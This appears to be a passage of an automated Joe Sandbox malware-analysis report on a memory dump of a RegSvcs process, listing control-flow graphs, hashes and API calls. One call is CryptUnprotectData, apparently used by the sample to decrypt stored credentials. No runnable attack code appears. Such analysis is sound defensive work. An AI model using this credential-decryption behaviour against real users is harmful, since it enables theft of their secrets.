                                                                                                                                        • API String ID: 0-2167574748
                                                                                                                                        • Opcode ID: 8b7eb5dfa94aac8796ead674e4283efcaa36dc3fedf3aa51b2c943f31bb2597f
                                                                                                                                        • Instruction ID: 268bcdcb352750d0d86359c6fec1c620c05b0e096526288d619aa41b5e38ca3b
                                                                                                                                        • Opcode Fuzzy Hash: 8b7eb5dfa94aac8796ead674e4283efcaa36dc3fedf3aa51b2c943f31bb2597f
                                                                                                                                        • Instruction Fuzzy Hash: C251DDB45593848BE3748F118482B8FBBB1FB92300F548A1CE6D86B794DBB84446CF97
                                                                                                                                        APIs
                                                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00419773
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2318663887.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000C.00000002.2318642874.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318700801.0000000000442000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318718813.0000000000445000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318738423.0000000000456000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_RegSvcs.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CryptDataUnprotect
                                                                                                                                        • String ID: QOTL$cfgdQOTL(
                                                                                                                                        • API String ID: 834300711-1041102262
                                                                                                                                        • Opcode ID: bd3e6b6710571ce0f7f297ce9ad6732a7ea485439775ce81df820cd45722396c
                                                                                                                                        • Instruction ID: baae48468f02253949789be9a9f93deb31354230cf9b03ea4ad6e7f0ba5e09aa
                                                                                                                                        • Opcode Fuzzy Hash: bd3e6b6710571ce0f7f297ce9ad6732a7ea485439775ce81df820cd45722396c
                                                                                                                                        • Instruction Fuzzy Hash: 86920FB55007018FD7248F24C8917A2BBF2FF96314F0986ADD4968F7A2E738E845CB95

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 709 441160-44117f 710 441180-441189 709->710 710->710 711 44118b-441201 710->711 712 441210-44123a 711->712 712->712 713 44123c-441247 712->713 714 441295-44129c 713->714 715 441249-441251 713->715 716 441260-441268 715->716 717 441271-441277 716->717 718 44126a-44126d 716->718 717->714 720 441279-44128d call 43e470 717->720 718->716 719 44126f 718->719 719->714 722 441292 720->722 722->714
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2318663887.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000C.00000002.2318642874.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318700801.0000000000442000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318718813.0000000000445000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318738423.0000000000456000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_RegSvcs.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID: @$P?l1
                                                                                                                                        • API String ID: 2994545307-4135037845
                                                                                                                                        • Opcode ID: 3becf2e6267f2f0d5db30200196983eb7bad3876ae10ab6730cdd94e317f575a
                                                                                                                                        • Instruction ID: 048af27f90df81157f785fbe2478cdb9cc1881c609c9a8ec9846b5c2d3b7d9fc
                                                                                                                                        • Opcode Fuzzy Hash: 3becf2e6267f2f0d5db30200196983eb7bad3876ae10ab6730cdd94e317f575a
                                                                                                                                        • Instruction Fuzzy Hash: 23310F712093049BD304DF58C4C162BBBF4FF99344F04882EEA949B3A0D37999488B9A

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 723 427e50-427e78 724 427e80-427e9f 723->724 724->724 725 427ea1-427ead 724->725 726 427ef4-427f05 725->726 727 427eaf-427eb7 725->727 728 427f10-427f39 726->728 729 427ec0-427ec7 727->729 728->728 730 427f3b-427f3f 728->730 731 427ed0-427ed6 729->731 732 427ec9-427ecc 729->732 734 427fc0-427fc2 730->734 735 427f41-427f6f call 43ba10 730->735 731->726 733 427ed8-427eec call 43e470 731->733 732->729 736 427ece 732->736 740 427ef1 733->740 737 4282bf-4282c8 734->737 742 427f70-427f8f 735->742 736->726 740->726 742->742 743 427f91-427f9d 742->743 744 427fe6-427fea 743->744 745 427f9f-427fa7 743->745 746 427ff0-427ff9 744->746 747 4282b6-4282bc call 43bab0 744->747 748 427fb0-427fb7 745->748 749 428000-428015 746->749 747->737 751 427fc7-427fcd 748->751 752 427fb9-427fbc 748->752 749->749 754 428017-428019 749->754 751->744 753 427fcf-427fde call 43e470 751->753 752->748 756 427fbe 752->756 760 427fe3 753->760 758 428020-42802e call 4086e0 754->758 759 42801b 754->759 756->744 763 428040-42804a 758->763 759->758 760->744 764 428030-42803e 763->764 765 42804c-42804f 763->765 764->763 767 428063-42806a 764->767 766 428050-42805f 765->766 766->766 768 428061 766->768 769 428070-42807b 767->769 770 4282ad-4282b3 call 4086f0 767->770 768->764 771 4280cb-4280e4 call 4086e0 769->771 772 42807d-428087 769->772 770->747 783 428224-42824f 771->783 784 4280ea-4280f0 771->784 774 4280a6-4280aa 772->774 777 428090-428098 774->777 778 4280ac-4280b5 774->778 780 42809b-4280a4 777->780 781 4280c0-4280c4 778->781 782 4280b7-4280ba 778->782 780->771 780->774 781->780 787 4280c6-4280c9 781->787 782->780 786 428250-428285 783->786 784->783 785 4280f6-4280ff 784->785 788 428100-42810a 785->788 786->786 789 428287-4282aa call 4095f0 call 4086f0 786->789 787->780 790 428120-428125 788->790 791 42810c-428111 788->791 789->770 794 428150-428162 790->794 795 428127-42812a 790->795 793 4281c0-4281c6 791->793 801 4281c8-4281ce 793->801 798 428164-428167 794->798 799 4281da-4281e3 794->799 795->794 797 42812c-42814b 795->797 797->793 798->799 802 428169-4281ba 798->802 805 4281e5-4281eb 799->805 806 4281ed-4281f0 799->806 801->783 804 4281d0-4281d2 801->804 802->793 804->788 809 4281d8 804->809 805->801 807 4281f2-42821a 806->807 808 42821c-428222 806->808 807->793 808->793 809->783
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2318663887.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000C.00000002.2318642874.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318700801.0000000000442000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318718813.0000000000445000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318738423.0000000000456000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_RegSvcs.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID: KJML
                                                                                                                                        • API String ID: 2994545307-719402181
                                                                                                                                        • Opcode ID: 047a39d410258730b55ffd70122697ff74f0c2f7194d4f2e39714ae107d892bb
                                                                                                                                        • Instruction ID: 4bf9e5fc8db60ad1477a33ee92378b1d27c7b974a179eba886eae4bae89287da
                                                                                                                                        • Opcode Fuzzy Hash: 047a39d410258730b55ffd70122697ff74f0c2f7194d4f2e39714ae107d892bb
                                                                                                                                        • Instruction Fuzzy Hash: 34C15A71B093218BD714CB24E88177FB792EF95300F59856ED8868B391EA3DDC06C79A
                                                                                                                                        APIs
                                                                                                                                        • LdrInitializeThunk.NTDLL(0041173D), ref: 0043E49E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2318663887.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000C.00000002.2318642874.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318700801.0000000000442000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318718813.0000000000445000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318738423.0000000000456000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_RegSvcs.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2318663887.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000C.00000002.2318642874.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318700801.0000000000442000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318718813.0000000000445000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318738423.0000000000456000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_RegSvcs.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: tw
                                                                                                                                        • API String ID: 0-3303754386
                                                                                                                                        • Opcode ID: 24ea2188b8e1636f3f8cd3459eaa518c333ba647ec784111f40071de7f37294e
                                                                                                                                        • Instruction ID: 53010c2ad1a460e616b227301a7f5352827963e4b1c26d3e7b98a7d2cb011674
                                                                                                                                        • Opcode Fuzzy Hash: 24ea2188b8e1636f3f8cd3459eaa518c333ba647ec784111f40071de7f37294e
                                                                                                                                        • Instruction Fuzzy Hash: 5821337660D3408FD714CF24C8E136BFBF2EBD6304F25992CE59253281CAB5D9018B4A